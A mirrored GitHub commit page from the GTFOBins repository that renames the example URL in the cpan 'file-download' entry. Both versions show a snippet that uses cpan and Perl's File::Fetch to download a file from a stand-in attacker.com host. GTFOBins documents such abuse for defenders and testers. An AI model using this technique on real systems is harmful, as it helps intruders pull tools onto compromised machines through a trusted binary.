mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Polish cpan
This commit is contained in:
		| @@ -23,7 +23,7 @@ functions: | ||||
|   file-download: | ||||
|     - description: Fetch a remote file via HTTP GET request and store it in PWD. | ||||
|       code: | | ||||
|         export URL=http://attacker.com/evil.txt | ||||
|         export URL=http://attacker.com/file_to_get | ||||
|         cpan | ||||
|         ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch(); | ||||
|  | ||||
|   | ||||
		Reference in New Issue
	
	Block a user